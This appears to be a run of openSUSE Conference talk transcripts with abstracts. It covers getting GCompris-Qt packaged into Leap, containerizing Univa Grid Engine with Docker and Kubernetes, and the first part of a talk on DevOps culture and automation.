Continuing the timeline: we fixed a bug in less than two days. Then, I would say, the two dependencies took less than four days to get into Factory and Tumbleweed, so that was easy. But then GCompris-Qt and the voices were rejected by the legal queue, and upstream took at least a month and a half to fix all the voices, because they had to contact every author, something like 40 people. That takes a bit of time. Then they had to release a new version; we agreed we would wait for the next release to bring in the new license and the new layout. So we repackaged it, the submission to the education project got accepted, and we submitted again. And then the request was stuck in the review queue for two months, partly because I was busy and was not pinging all the time. I know that our legal review is really one of the most boring things you can have to do, so I'm happy to say that we will perhaps soon have an open source bot for it. I hope we can also offer that as a service, so upstreams will be able to send their tarball to the bot and get a summary of whatever mess of licenses they have. That would help a lot during the first submission to Factory. But then, yes, I was a bit worried because I missed the 42.2 release. I could have made the effort to create a maintenance request to add the package afterwards, but 42.3 was not that far away, from November until July, so I said, I don't know if it's really worth the effort. So until then it's still available in the education repository, even though you shouldn't have to use additional repositories; after July it's fine. Any other question? So thank you very much.
Whenever you are curious about how sources become installable software in Leap without additional repositories, or think about contributing to the openSUSE project with some packaging work, this talk will retrace the journey of the gcompris-qt package from its upstream source to the final package that is natively available in openSUSE Leap 42.3. I will explain in detail the different steps to follow, how to do them, and some recipes against common traps. At the end, you will have a good overview of what it means to get a package into Factory. You will also have a step-by-step roadmap for making your first contributions.
10.5446/54480 (DOI)
Welcome everybody. I will talk about how to bring your application or your workload from bare metal to the cloud. I'm pretty lucky that at least a couple of people joined; a few minutes ago only one guy was here, so I was a bit afraid nobody would come. Okay. This will be the agenda of my talk. I will do a short introduction, which in the end means who am I and what's my background on this topic. I will give you just a couple of words on how to dockerize your application and how you can bring your Docker image into the cloud, which in my case means into Kubernetes. At the end, we will do a short demo, so you will see how to write all these files and how to bring them into a running Kubernetes cluster. And there's always time for questions and answers. Who am I? My name is Stefan Haas, Senior Software Engineer at Univa Corporation, a small American company. I'm a former SUSE employee, but that is meanwhile nine years ago; I wrote my diploma thesis in the YaST team back then. After that, I started to work for Sun Microsystems, later for Oracle due to the acquisition, and I was part of the development team for Grid Engine. That is meanwhile also the main product of my current company, and Grid Engine will be the test object for this talk: we will try to containerize Grid Engine and bring it into the Kubernetes cloud. My current main focus is NavOps Command, a product which is more or less a scheduler and policy management system for Kubernetes; we are exchanging the stock scheduler of Kubernetes. But that's another topic. First of all, just a small introduction to what Univa Grid Engine is, so that you have a bit of an overview of what we want to get into the cloud. UGE, the abbreviation, is a batch queuing system. Some of you might remember it as Sun Grid Engine or Oracle Grid Engine; it's all the same product. So it's a batch queuing system, or if you want, grid computing cluster software, or some folks call it a distributed resource management system, whatever you want. The main parts in this architectural overview are the UGE master and the execution daemons. The master is responsible for all incoming requests by the user, like qsub, which means submitting a job into your batch system, or when some administrator wants to configure it via qconf or things like that; everything goes to the master. The master is also responsible for scheduling the jobs and for the actual dispatching of the incoming jobs to the execution daemons. The execution daemon is the second part we need to containerize; it is responsible for actually executing your workload and for monitoring the job on your, in former times, bare-metal machine. So again, these are the two components we want to bring into the cloud. We will end up with just one image which includes both the master and the execution daemon, but you will see how, at boot-up time of the container, it recognizes what it has to start and run. So first of all I want to start with how you can dockerize your application or your workload. First: we do not create containers, we create images. So what's the difference? An image is, let me say, a standalone and executable package which includes everything we need to run our application. The container, on the other hand, is the real runtime instance of that image. Usually, by default, if you do not do anything fancy, a container is completely isolated from the host environment.
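Before the Docker part, for those who have never touched Grid Engine, a hedged sketch of the user-facing commands just mentioned; exact options may vary between Grid Engine versions:

# submit a simple binary job to the cluster (-b y = treat the command as a binary, not a job script)
qsub -b y /bin/sleep 60

# watch the job queue and see where the job was dispatched
qstat

# administrators change the cluster configuration with qconf, e.g. listing the execution hosts
qconf -sel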
If you want to create a Docker container or a Docker image, you have to create a manifest or a recipe; in the Docker world, that is a Dockerfile. A Dockerfile defines what goes inside your container. You can grant access to resources like network interfaces, which are usually not available from outside the container; for example, you map some ports, port 80 if you want to run an nginx instance or something like that. You also have to specify which files you want to copy into your container; first of all, we need to copy our application inside. So let's have a look at a real-world example. In the first line, you say which image you base yours on. As this is the openSUSE Conference, and this is a real-world example we run at customers: our Grid Engine image is based on openSUSE. We chose that, first of all, because I'm an openSUSE member, and second because the openSUSE image is way smaller than most of the competitors. The base openSUSE image, which is just 42 (we are using 42.1), is about 100 MB. If you compare it with CentOS or something like that, you're at 150 or even 200 MB. Then you state the maintainer, which in this case is me. Then we run commands. For running Grid Engine in that container, and later on for running workload in it (workload in the sense of Grid Engine jobs), I'm installing a couple of additional packages: in this case sssd, vi (which is needed for the configuration of Grid Engine), and we also need Java, because our Grid Engine REST API is written in Java. After that, we clean all the temporary files from zypper. We define a working directory, which is the current working directory you get when you start up the container. I copy a bunch of files into that working directory, among them the scheduler configuration for Grid Engine, details which are not that important. And, this one is important, we copy a wrapper script and rename it to uge. This will later be our so-called entry point. The entry point is the process or script which gets executed when you start your Docker container without any additional command: if you do a docker run with the image name, it will start whatever you state as the entry point. As soon as this entry point script or process stops, your container will automatically stop too. You can also, as you have seen here with zypper, have several run commands; here, for example, I install an additional RPM which is not available by default in any of the repositories. And here is another interesting thing: I have to expose a couple of ports. As said, usually no port of a container is reachable from the outside. So I have to expose the port for my qmaster process, so that my execution daemons can communicate with the qmaster; the port for the execution daemon; and the last one, the port for my UGE REST interface. Let's go back to the slides. If you want to generate and test your image, you simply do a docker build -t (the -t means you give it a tag and a name), and you have to say where Docker will find your Dockerfile. After that, you can simply execute docker images, and you will hopefully find your application listed there with its tag.
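A hedged, much-simplified sketch of a Dockerfile along the lines just described; package names, paths, and port numbers below are placeholders, not the real product's values:

# write a minimal Dockerfile (all values here are illustrative)
cat > Dockerfile <<'EOF'
FROM opensuse:42.1
MAINTAINER you@example.com
RUN zypper --non-interactive install vi java-1_8_0-openjdk && zypper clean --all
WORKDIR /opt/uge
COPY wrapper.sh /opt/uge/uge
EXPOSE 6444 6445
ENTRYPOINT ["/opt/uge/uge"]
EOF

# build the image and list it afterwards
docker build -t uge-demo:latest .
docker images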
If you do not add a tag, it will automatically be called latest, with a certain image ID. I will not show you how to build the Docker image, because at least in the case of Grid Engine it takes about 10 minutes to build all that stuff: it has to grab the complete openSUSE image, which is about 100 MB, and install all the additional software. After that, you can locally execute your container via docker run and your image name. And again, this will just start, inside your container, the application you configured as the entry point. So now we have a Docker image, that's okay, but we want a cluster of Grid Engine nodes, and you do not want to go to every one of your nodes, install the Docker image, and start it up by hand. If you did it like that, there would be no point in having a Docker image at all. So for that we are using Kubernetes. What's Kubernetes? It's an open source system, hosted by the CNCF, the Cloud Native Computing Foundation, and originally invented by Google. It's a tool for automating the deployment and management of containerized applications, so not only Docker, but I think, at least among the customers we have, at least 95% run Docker images as their workloads in Kubernetes and nothing else. Kubernetes follows, similarly to Grid Engine, a master-slave architecture, so the components can be divided into those that manage the individual nodes and those on the master. The most important node component is the so-called kubelet, which is responsible for starting the pods (I will tell you in a moment what a pod is, but to keep it simple, it is the container itself), and we have the Kubernetes master, which includes the stock scheduler and, for example, the etcd instance, a key-value store holding all the configuration of Kubernetes. To give you a short overview of the terms in Kubernetes, so that you know what I'm talking about: the first thing, which I just mentioned, is a pod. This is the basic building block of Kubernetes; it's more or less a process on your Kubernetes host node. A pod encapsulates one or more containers (you can run as many containers as you want in a pod) as well as resources like storage. We will see that in our example: for Grid Engine we need additional storage for our daemons. You can also encapsulate resources like network interfaces and things like that. The next thing I want to talk about briefly is the controller. A controller in Kubernetes is, simply said, a concept or manifest for how you want to deploy your pods in a cluster. For example, I chose a replication controller for the execution daemon. The replication controller works like this: you say, I have this execution daemon, here is a template of a pod, this pod wants storage, and the container wants that storage mounted at this and that path. The controller is then responsible for how many of them you want to have, for example five replicas, and it makes sure that you always have these five pods running in the system. So, in the case of a replication controller, if one of the pods dies, the replication controller will automatically start up a new one. If you downscale a replication controller (you do not want five anymore, you are okay with three), it will automatically kill two of them. The last thing I want to briefly introduce is the service. Pods in the Kubernetes world are, as they call it, ephemeral or mortal.
This means they are born, and when they die, they do not get resurrected or anything like that. While each pod gets its own IP address, you cannot rely on those IP addresses being stable over time. So a Kubernetes service is more or less an abstraction which defines a logical set of pods (you can have multiple pods behind a service) and a policy by which to access those pods. Think of a multi-tier application: you have a web server and a database, and you do not want to access a specific pod instance on your Kubernetes cluster; you want to access the service for all of that. So when it comes to bringing your Docker image to Kubernetes, first of all we have to decide which controller fits your application best. Here's another example, a DaemonSet: with a DaemonSet, you can ensure that every node in the cluster runs an instance of your pod. And you have to prepare storage for your application; we need to do that. Storage in Kubernetes can be NFS, CephFS, Amazon EBS, an Azure disk, or something in the Google Cloud, wherever you want. It can also be a so-called hostPath, which simply means a local path or local directory on your node, which is really only reasonable for demo purposes. So again, a real-world example. First of all, I want to show you my demo environment. Unfortunately the demo gods haven't been with me: I destroyed my CaaSP installation yesterday evening, so I have to fall back to Minikube. Minikube is a virtual machine which runs Kubernetes inside. That's also the reason why I'm now relying on a local hostPath; usually I show this with an NFS server running as a pod. Okay, nevertheless. First of all, we have to create a PV, a persistent volume. This is the storage provisioned by the administrator; again, this can be NFS, whatever you want. The administrator says: okay, I have an NFS share here, it's mounted on this server, you can access it via this NFS server, and there are 30 gigs of storage. Then we need a PVC, a persistent volume claim. This is the request for storage by a user. A user usually does not care where his storage is; he does not want to know whether it's on Amazon, on Microsoft Azure, or somewhere in the Google Cloud. The only thing he says is: okay, I need five gigs here, something like that. For the UGE execution daemon, I chose a replication controller, just for demo purposes; usually, for an execution daemon, you would choose a DaemonSet, which means you have one execution daemon per node in your Kubernetes cluster, but in a Minikube environment that doesn't make much sense. For the UGE qmaster, I chose a StatefulSet. A StatefulSet is pretty similar to a replication controller, with the difference that a StatefulSet provides a unique identity to your pods: the first one will be called uge-qmaster-0, the second one -1, then -2, and so on. Whereas with a replication controller you get an execution daemon pod name followed by some arbitrary numbers and letters. Another good thing about the StatefulSet is that it provides a guarantee about the ordering of scaling and deletion. As said, you can count on the numbers, and if you downscale your StatefulSet, you can be sure that the last one gets killed first. You don't get that guarantee with a replication controller. Last but not least, we need a service.
So in this case we need a headless service, as we have only one qmaster running, and this headless service is tied to the stateful set, which means we get a DNS entry directly for the UGE qmaster pod. So we can connect from the outside to our Univa Grid Engine cluster; we can do a qsub or qconf even from outside of Kubernetes if you want. Let's go back to the examples and start with the persistent volume. Again, this is what you as an administrator have to create: you have to create or prepare some storage that your pods or controllers or whatever can rely on. This is a pretty simple example; you can make it as sophisticated as you want. First of all, you can do your configuration in Kubernetes either via JSON files or via YAML. In my opinion a YAML file is easier to read, so I chose that for the demonstration. The first line says: okay, this is all about the persistent volume. In Kubernetes you always have to say which API version this persistent volume belongs to. You have to give it a name, for sure. And in Kubernetes you can add labels; these are just simple key-value pairs which you can use for sorting and selecting later on. There is nothing special about them in Kubernetes itself, it's just for monitoring and stuff like that. So I said: okay, this is of type local. You have to specify what kind of persistent volume this is. I give it a capacity of 10 gig of storage. You have to specify the access mode; in this case I said ReadWriteMany, which means that many different nodes can read and write to this persistent volume at the same time. And I have to say what kind of persistent volume this is: in this case it's a hostPath, which means a local directory on the node the persistent volume gets created on. If you had an NFS server, you would say NFS here, and you would have something like a server entry and so on. Then this is the persistent volume claim. This is the thing the user will create and rely on. Again, I said what kind it is, a persistent volume claim. The name is uge-claim. I have the same access mode, and I request three gig: for my workload, my application, my pod, I need three gig available. So this is my request, and that would be all about the storage. Now let's dive into the controllers. This is the replication controller responsible for the execution daemon. Again, you have to give it a name and say what it is at all; this is the specification for the replication controller. When creating this replication controller it will not boot up any pod at first; you could also say you want it to boot up ten or something like that. Then you have to specify what container, or containers, you want to run inside this pod. Again, you can have multiple containers running inside; in this case we have only one, and I named that container execution daemon. You have to say where Kubernetes can download the image; in my case I have it lying in the Google Cloud registry. You can additionally add a so-called pull policy. In my case it says: if the image is not present on the node where you want to start this pod, please go to this location and download it. You can also say something like Always; in that case it will always go to that path and check whether there is a newer version of your application. And you can pass environment variables directly into your container. In my case, I have a couple of them.
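Put together as YAML, the persistent volume and claim just walked through would look roughly like this. It is a reconstruction from the description above (hostPath, 10 gig, ReadWriteMany, a 3 gig claim named uge-claim); the directory path is a placeholder and this is not a copy of the speaker's actual files.

  apiVersion: v1
  kind: PersistentVolume
  metadata:
    name: uge-pv
    labels:
      type: local
  spec:
    capacity:
      storage: 10Gi
    accessModes:
    - ReadWriteMany          # many nodes may read and write at the same time
    hostPath:
      path: /data/uge        # local directory; an NFS definition would go here instead
  ---
  apiVersion: v1
  kind: PersistentVolumeClaim
  metadata:
    name: uge-claim
  spec:
    accessModes:
    - ReadWriteMany
    resources:
      requests:
        storage: 3Gi         # the user only asks for 3 gig, not where it comes from

The claim is what the replication controller and the stateful set reference in their volume sections, which is how the execution daemon pods and the qmaster pod end up sharing one directory.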
The first of these environment variables is the UGE type: it says what the container should start inside, so in this case it should start an execution daemon. The next one is just for demoing purposes, the UGE deletion timer: if this were not zero, it would cause the pod to destroy itself when, for example, there has been no workload running on your execution daemon for 10 seconds. And I want to know, inside the container, in which namespace I am running. In Kubernetes you can have different namespaces, which is a pretty basic and simple way to divide your Kubernetes cluster into different sections. For example, you want to have a development namespace and additionally one for production. You can also add lifecycle hooks. In this example I added a preStop hook, which means that right before the pod actually gets stopped or killed by Kubernetes, it should execute that command. This command just goes to the qmaster and says: okay, I will not be available anymore in a couple of seconds. And again, like in Docker, you have to say which ports should be accessible from outside of Grid Engine, sorry, of Kubernetes. The last couple of lines say: okay, I want to mount a path inside of my container, and this path should come from the persistent volume claim we just created, the so-called uge-claim. So this one will be available in all my execution daemon pods later on. Then this is the stateful set for the qmaster. It's pretty much the same, except that it's a stateful set and I want to boot up one replica right at creation time. A couple of environment variables are missing which are not necessary for the qmaster. But again, I want to have a shared directory between the execution daemons and the qmaster, and you can see here that it is the same persistent volume claim; this claim will be available in my qmaster pod as well as in my execution daemon pods. This takes a while, I have to boot up my Minikube cluster, it should take a couple of seconds. I created a script which adds all these YAML files to my Kubernetes cluster, because we have four, five different files here, we have the service as well, and it's always the same: you do a kubectl create -f with these YAML files, so we do not have to look at that. Okay, Minikube is up and running and there are no pods running so far, so let's create our UGE cluster. As you can see here, the first thing I did was create the persistent volume. After that I was able to create my persistent volume claim, and then I started up my UGE qmaster: I created my stateful set for the qmaster and I created the replication controller. Now we should have one qmaster replica running but no execution daemon. So we have one qmaster running here, one of one. Let's add a couple of execution daemons. Okay, it says I scaled my stuff, and now you can see that we have three execution daemons up and running. Now we can go inside the qmaster just to demonstrate that they are really up and running and that we really have a running Grid Engine cluster. For those who are familiar with Grid Engine: you can see here that I am on my qmaster host and I have three different execution daemons running, which are exactly the pods we just booted up in my Minikube environment. So that's what I wanted to show you. Are there any questions? I don't see anybody. Okay. Thank you.
Kubernetes is an open source project for orchestrating containerized applications. But how to containerize your workload? How to bring your containerized application into Kubernetes? This talk will show how we transferred our application to Kubernetes. - This includes containerizing the application (based on an openSUSE Docker image) - How to expose your application services via Kubernetes. - How to create a shared file system for all Pods belonging to your application via Kubernetes. I will show how to do that, plus a demo on a running Kubernetes system provided by SUSE CaaS.
10.5446/54482 (DOI)
My name is Craig Gardner and I have listed here two different roles that are significant as they apply to this presentation and to this particular conference. I am an engineering manager at SUSE, and in that role I lead a team that produces what's known as SUSE Enterprise Storage, based on Ceph, the open source project called Ceph. And the second role that I have listed here is that I am an adjunct instructor of computer science at a university near where I work. And in those kinds of experiences my students often tell me that it's great to have an instructor at the university who has real-life experience in the things that are being taught. And I value that and I think my students value that. And when I am teaching at university I usually have 40 or 50 students there attending, but they're there because they have to be, and you're here today because you at least are presumed to want to be here for this talk today. I picked up this great screenshot, this, what do you call that, background screen. What do you call that? Background, yeah, it's a background. So I have no idea who's responsible for it. I googled it at one point looking for something interesting and I thought, that's beautiful and I need to use that, because I've got this Game of Thrones thing going on. There's a nice dragon represented with the SUSE logo here, and I just have a few slides; I think I'll just read through all of my slides and that'll be the most interesting way to go through this. And yes, Mark, I really don't have 413 slides, that's a joke, so I wanted to make sure you're aware. The subtitle that I have here has to do with trying to do the right things. And as an analog to this: I come to Nuremberg with some very comfortable frequency. I love coming and visiting Nuremberg; our SUSE headquarters is here in Nuremberg. So I have the great privilege and opportunity to come and visit here with some regularity. And when I do, I also like to explore the city. I like to find different places that are interesting and I like to try to go different routes to the same place from time to time. And as a case study to apply to this: as I was getting ready to come here on the first day of the openSUSE Conference, I got lost. And for the most part on purpose, right? I wanted to try and find a different way of getting to the place where I was going. I knew where I was going and I chose to take a different route to get there, and I ended up getting lost. I did eventually arrive at the right place, and I had all the right intentions and all the tools at my disposal to do the right thing, and I did it in the wrong way. And of course I did eventually get where I needed to go and that was a good thing. But sometimes we make decisions with good intentions and knowing where it is that we want to go, but we make mistakes along the way. And a good team and a good organization learns from those mistakes and improves upon those kinds of things. So my point here is that as I share with you some of my thoughts, both applied and academic, about DevOps, I hope that you will take what I have as not mean-spirited but encouraging and likewise enlightening. So as we talk about DevOps here for a moment, I ask myself what DevOps has to do with an openSUSE conference, and maybe it doesn't. But I often, in my academic and professional experiences, have conversations with a vast number of people that don't understand open source. Yeah, you too, right?
In the classroom I am often trying to teach students about open source, about open source methods, about open source values, and yet the questions persist until they get some more practical experience with open source. Their questions are limited to: open source is, for example, just those discrete components of the LAMP stack, right? Open source is just Linux and a little Apache and a little database and then some kind of application, and it isn't until they start to see beyond those discrete components that there is really a broader, more valuable purpose to open source ideas and open source methodologies. But the same thing happens when I have conversations even with those kinds of customers and those kinds of organizations that deal with SUSE and Red Hat and other open source valuing companies. They don't understand what open source is intended to provide for them. So I want to try to apply this concept about DevOps through these consistent misunderstandings about what open source is intended to provide. As I talk today about DevOps, we have a few things that we want to make sure that we identify here, and that is that DevOps is just as widely misunderstood as is the general topic of open source. I even got a recent notification in my email inbox from some group in the LinkedIn community. It happens to be the DevOps group in the LinkedIn community, where someone had posted an article about how to become a DevOps. As if there were some formula or some recipe to follow to become a DevOps, which was actually interesting, as if it were now known that if I did that, I would become a DevOps by virtue of following the advice that came in this group. So there are many misconceptions about what DevOps is. So I ask you, as people consider what DevOps is: is it a magic wand or a silver bullet or a golden hammer? And as we drive down to the purposes of the evolution of DevOps, we want to try to economize the collaboration of all the parts involved in delivering a software solution. A textbook would tell us these sorts of things. DevOps is a practice of operations and development engineering participating together in the entire service life cycle, blah, blah, blah, blah, characterized by operations staff making use of many of the same techniques as developers. Well, now that's where I think it becomes a more interesting discussion: the union of, or at least the combining of, the narrowing of the gap between operations and development. And perhaps, if you have some experience with DevOps, you will have seen a graph, a Venn diagram, similar to this. This comes directly from Wikipedia as it tries to describe, with great conflict, what DevOps really is. It's this union of development and quality assurance and operations that is DevOps. Reality tells us some interesting things about it as people have put DevOps into practice and as people try to squeeze the value out of these principles of DevOps. We start to understand that as much as DevOps has a lot of hype, it's not really anything new. It's a process, and though it sounds a little bit derogatory, it's just another process. But it's built upon a variety of very found, sorry, very sound foundational principles that have brought success to a variety of different software endeavors for many, many years. What's important to know is that DevOps, as much hype as there is about it, is not a silver bullet that solves all problems.
But yes, DevOps, or surely the principles that are associated with it, can work, can be made useful in delivering your software solutions when the conditions are right, when you've got the right people with the right attitude, with the right skills, where these people that you have with the right skills are hardworking and full of integrity, and in lots of cases a lot of coffee. What do I mean when I say that DevOps is not necessarily new? Well, it's really an evolution of a long-existing culture of trying to provide value through these principles known as continuous integration and continuous deployment. You've surely heard those before, but those are old, antiquated terms. Let's go ahead and slap a new title on it called DevOps, and we'll add a few extra things to it that I'll just mention here as continuous foo: continuous monitoring, continuous updating, continuous bug fixing, continuous testing, right? All of these different continuous things. Does that mean that it's bad? Absolutely not. It's just that it's now a sexy way of trying to put these things together and a sexy way of getting these people together to deliver software value quickly, more agilely, and more effectively. It means simply more efficient collaboration amongst a variety of different entities. Well, what kinds of entities are we talking about? Yeah, it's different for different organizations, which is exactly what a process that implies agility is supposed to be all about, right? If it's an agile process, it should be able to be applied in a variety of different ways under a bunch of different circumstances, and that's good. That's a good process. A good process that can accommodate some variability is a good process. You have lots of ways that these sorts of things are implemented. You have people that call it DevOps and ITOps, and you even have the folks like at Google that have called this now WebOps. Yeah, that's good stuff, right? If Google says it's good and if Google gives it a title, then it's got to be the best thing ever, right? Well, some of the experts in this world watch how these kinds of processes develop and how the people who are involved in these processes start to come together, and you start to assemble a lot of specialists that know an awful lot about an awful lot. But it becomes a Herculean kind of definition of what a WebOps engineer is supposed to be able to do, right? That WebOps engineer has got to be able to know everything about networking and has to have some knowledge about routing and has to know about all the different flavors of Linux and Unix that are involved and knows about caching and knows about this and knows about that and has to stop speeding trains with his teeth, right? Multi-disciplinary experts that in reality are kind of a Montgomery Scott saying, I cannae change the laws of physics, captain, right? That was terrible, wasn't it? That was a really bad Scottish accent. But you know that this becomes either an impossible task in the realms of the mythical, or, as you're trying to get people involved in this process who master all of these disciplines, you burn them out and they die, and nobody wants that. How do we then make value out of a process that isn't new, that continues to allow you to economize the collaboration of a variety of people with different skills, different aptitudes, different abilities? What does DevOps try to control? Well, typically we talk about, historically we talk about, web-type applications. But it's not limited to that.
In fact, we even had this great presentation from the AppImage guy, Simon Peter, brilliant, who talked about how DevOps is very useful in terms of turning around each of the AppImages. When there's a change, it can go through his DevOps process and validate and test and deploy these new AppImages on a fairly routine basis, a fairly frequent basis, and in a substantially automated way. DevOps is intended to control the agility that's involved in all of the performance: scaling systems up, tearing them down when they're not needed anymore, getting the new code out as quickly as possible, at least the good code out as quickly as possible, and not being afraid to get code out there quickly that might have bugs, because you have confidence in your process, you have confidence in DevOps, so that you can turn it around even more quickly if you find a problem. But sometimes that becomes a very difficult race condition. You don't want to be afraid to make mistakes, but mistakes look bad; you hurry to get something out as quickly as possible, you feel that your process facilitates that agility, you get something out that has now a new problem, and it's a very rapid falling forward. Now, I'm not trying to paint that as a bad thing, but it's something that needs to be controlled and managed. The DevOps processes want to control that flow of delivering value to the people that are using your software solution. What does it intend to fix? Is it broken that DevOps has to be the sexy thing of today that everybody wants to do because it fixes all problems like a good golden hammer? Well, it intends to fix poor communication, and particularly that challenged communication that happens between development and deployment. And for the purposes of what it is that we're trying to fix, we typically lump the efforts of testing in with developing. But we know that you have to do testing from an ops perspective as much as you need to do testing in the dev functions, and it's important for us to not lose sight of that universality of testing. DevOps wants to try to simplify and to enhance the collaboration of the testing efforts between the dev and the ops. Other things that DevOps wants to fix: it wants to fix the inefficiencies of handing the code over from the one side to the other. It wants to handle the inefficiencies of providing a feedback loop, both good and bad, of what's being experienced with the software solution. It wants to handle the conflicts that take place as a result of the inherent inefficiencies of that. And it wants to incorporate some sense of agility into the operations in the same way that developers have attempted to incorporate agile processes into their development practices. It is also an important addressing of inefficiencies that happen in terms of customers and trust: of being able to say, I trust what this software service is, and I can give my trust as a result of the fact that there's not this conflict that happens between both development and operations. And there are lots of successful companies that do these kinds of things, that use DevOps to their advantage, that build trust in the teams that are producing these kinds of solutions. If you look at very highly successful companies like eBay, they use a very DevOps-oriented approach to how they release software. You look at Google, lots and lots of DevOps, WebOps. That's their very specialized way of delivering value that everybody relies on, everybody can count on. Google is never down.
Google always gives you what it is that you need to have. And if eBay was ever down, how often would people lose confidence? How often would people start spending their money through eBay? How often would people start selling their stuff on eBay? Well there's some effectiveness that comes out of this, continuous integration and continuous deployment and continuous testing. If you've got the right people and you've got the right culture and if you've got the right product. The real problems that we have is not just an academic one. It's that you have the one side that doesn't trust the other. It's not just the trust that exists between a customer and the solutions provider. It's not just the trust between the customer and the solution itself, the software. There's the trust that has to take place and that is often the problem between what happens between development and deployment of the software solution. That IT manager that's supposed to deploy this software feels like the development process is absolute chaos. I never know what they're going to give me. I don't know if they've even tested the stuff that they're handing to me. I don't have any trust in what it is that they're handing to me on a routine basis. And not just that, I don't have any control over it. I can whine and complain to the dev team all I want. They don't hear me. They don't understand me. And nothing changes. But the same sort of thing happens from the dev side. They look at the operation side of the house and they say, I just write the code. I have no idea what those operations guys are doing with it. I don't even know if they're configuring it right. That's the reality of the kinds of things that are going on that DevOps says, we've got to fix this. We've got to bring those two together so that we don't have this mistrust. So DevOps as an ideology does these things. I'm going to skip over this slide, let you just ruminate on it instead of spending any particular time. But it allows you to collaborate more efficiently and effectively. But does that really mean that the process of DevOps makes your people collaborate better? Makes your people talk together better? No, it doesn't. It tries to facilitate it. It tries to make things easier. It tries to reduce the number of barriers that exist. But at the end of the day, it's the people that are associated with the process that do the collaborating and that do the communicating. So the process is at least trying to get those barriers out of the way and is trying to facilitate the means whereby that collaboration takes place. That's a good process. You have the kinds of things that a development team does listed here at the top. You've got the kinds of things that the operation team does with here at the bottom. And as you start to look at those, you start to understand that there are some inherent similarities. They are really largely the same thing. And so why is it that we can't get together on these things? Well, that's what DevOps wants to do. Because we're really doing the same thing, why can't we just do the same thing? And as you have the formalized definition of what is DevOps in terms of its process flow, you have these specific characteristics that are called out. You're going to code and then build and then test and then package, then release and then configure and then monitor it. And you all want to do this fairly quickly. You want to be able to have a quick pace, an agile pace. You want to be able to make changes quickly. 
You need to be able to do all of these things that matches the speed at which the demands for the software change. Have the speed of your delivery match the speed of the requested changes. It's not an easy thing to do. It's an interesting observation here as you look at this process flow and as my slide gives away, it looks kind of like a waterfall. And indeed, although DevOps wants very much to say, we hate waterfall, that's an antiquated process, we never want to have anything to do with waterfall, we're going to stick it to those old process guys. We're never going waterfall. The truth of the matter is, is that those waterfallish principles aren't necessarily a bad thing. And you want to make sure that you're doing things in sort of a deliberate flowing way that you can manage and that you can understand and that you can monitor and that you can improve upon. And that's what any good process is about. So instead of DevOps throwing the good of waterfall and the good of old well proven processes out, it's really just trying to refine those well intended and time proven processes like a waterfall process and just call it something cool that people can attach to and call it something that's agile so people can think that it's modern and make it as sexy as possible so that people will want to be associated with it. Again, I'm not trying to say that that means that DevOps is a bad thing, that it's a charlatan, that it's a disappointment. I'm not saying that at all. Let's just recognize what it is for what it is. So one of the really, really important details about DevOps is this principle of automation. Now did DevOps invent automation? Absolutely not. Not at all. But it makes good use of it. It incorporates it in part of its values and it really is important for us to figure out ways to do things in a more automated way. It makes it easier for us to do our work. It frees up our time of the monotonous to do the things that are more creative and useful and improvement oriented. Now you can't automate everything though. As much as we have people that exist that suggest or assert or preach that we're going to automate everything to the point that we don't have jobs anymore. And we had really interesting talk from Mark Seeger just a little while ago where he's talking about how there are some problems that are just complex that until we figure out how to automate it, we still have some smart, hardworking people that have to fix difficult problems that have to do some of the hard work. Automation should be employed both in Dev and in Ops. And it's reliant upon known consistent states. And as long as they're known and consistent, you should automate it. And that frees up our smart, hardworking time to anticipate those things that are unknown, that are unanticipated and work on how to solve those so that at some future time we can automate that particular aspect. In Dev we typically talk about those things in terms of unit tests and a variety of different things. And in configuration management is a particularly useful tool for Ops. What can be automated? Yeah, builds can be automated. That's probably the easiest thing. That's the most common thing that gets automated. But there's lots of automation used and deployed in our testing, both in Dev and in Ops. And automation is particularly useful for deployment of software, both in your test environment and in your production environments. 
And of course, all of the system administration, all of the servers that are involved, virtual and physical, should all be under some sort of automated mechanism and configuration management for this particular team. And as you do that, you start to remember that there are similarities in what dev does and what ops do, that you can kind of bring them together to do it the same way. A quick thought from a manager's point of view, as someone who has managed DevOps operations in a variety of different circumstances: what does it take to be a successful DevOps organization? You've got to have metrics. Measure everything. Knowledge is power. Make sure, just like I was saying all throughout this, that the purpose of DevOps is to overcome the barriers of collaboration and facilitate better communication. You've got to be able to facilitate the dialogue between the members of the team. The ones that are being devs within the team, the ones that are performing the ops responsibilities, you've got to facilitate that dialogue. Make sure that that kind of opportunity to talk is frequent; it doesn't have to be frequent, but it should be able to be as frequent as necessary. And that that kind of dialogue is not destructive. As a manager of a particular team, you've got to make sure that your team is collaborating constructively, and that those kinds of communications are well intended. Certainly misunderstandings take place, but the better the trust that you have amongst the members of this team that are doing DevOps together, the better the communication will be. The activities of the team should be ordinary. Too often we have teams that rely upon the spectacular, the heroic, the staying at work through all hours of the night, the staying at work on weekends, the kind of heroics that burn people out. The more ordinary, the more routine, the more commonplace the work that's being done in a DevOps organization, the more successful that organization will be at delivering value. Now, there may be heroic periods of time, but make sure that they are infrequent and make sure that they are short. Another important managerial aspect of making sure that a DevOps organization is successful is to invest in the team, invest in new ideas, have your team asking themselves routinely: what if? What if we did this differently? What if we changed this? What if we implemented this? Ah, what if we did this instead of that? What-if questions are fabulous in a successful DevOps organization. And as I have said and will continue to say repeatedly: trust, build an environment of trust. So we have the DevOps lifecycle. It starts with planning. You've got to make, oh, this is a great picture, a representation in Legos of M.C. Escher's staircase. I love it. It's really great. And it represents planning very well, right? It's a never-ending process. It's always going on. It's a Möbius of sorts. This is something that has to happen. The team must make time to plan, and don't leave out the operations part of this. Too often the devs get together and say, oh well, we're the first part of the process, we don't need to involve the operations guys, we're just going to do our own planning and they'll figure it out later on, or they'll inherit what it is that we have already planned. Bad news. Make sure that you are planning together to be successful in DevOps. Next step, execute. Create channels of opportunities to communicate; I mentioned that a little bit earlier in the manager's section. Embrace risk. Let people take risks.
